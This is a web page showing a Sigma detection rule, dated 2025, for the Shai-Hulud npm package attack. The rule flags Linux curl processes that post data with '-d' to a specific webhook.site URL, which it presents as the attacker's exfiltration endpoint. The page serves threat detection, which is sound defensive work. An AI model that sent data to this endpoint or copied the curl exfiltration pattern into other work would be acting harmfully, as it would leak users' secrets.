Shai-Hulud NPM Package Malicious Exfiltration via Curl

Oct 19, 2025 · attack.exfiltration attack.t1041 attack.collection attack.t1005 detection.emerging-threats ·

Detects potential Shai Hulud NPM package attack attempting to exfiltrate data via curl to external webhook sites.

Sigma rule (View on GitHub)

 1title: Shai-Hulud NPM Package Malicious Exfiltration via Curl
 2id: efd2eb09-b72e-4a61-8dc7-b1382a1e8983
 3status: experimental
 4description: Detects potential Shai Hulud NPM package attack attempting to exfiltrate data via curl to external webhook sites.
 5references:
 6    - https://www.getsafety.com/blog-posts/shai-hulud-npm-attack
 7author: Swachchhanda Shrawan Poudel (Nextron Systems)
 8date: 2025-09-24
 9tags:
10    - attack.exfiltration
11    - attack.t1041
12    - attack.collection
13    - attack.t1005
14    - detection.emerging-threats
15logsource:
16    category: process_creation
17    product: linux
18detection:
19    selection:
20        Image|endswith: '/curl'
21        CommandLine|contains|all:
22            - 'curl'
23            - '-d'
24            - 'webhook.site/bb8ca5f6-4175-45d2-b042-fc9ebb8170b7'
25    condition: selection
26falsepositives:
27    - Unlikely
28level: high

References

"Shai-Hulud" NPM attack runs malicious GitHub Action

An NPM attack compromised dozens of popular packages which then ran malicious GitHub actions in the compromised accounts

Read More

Shai-Hulud NPM Package Malicious Exfiltration via Curl

Sigma rule (View on GitHub)

References

"Shai-Hulud" NPM attack runs malicious GitHub Action

Related rules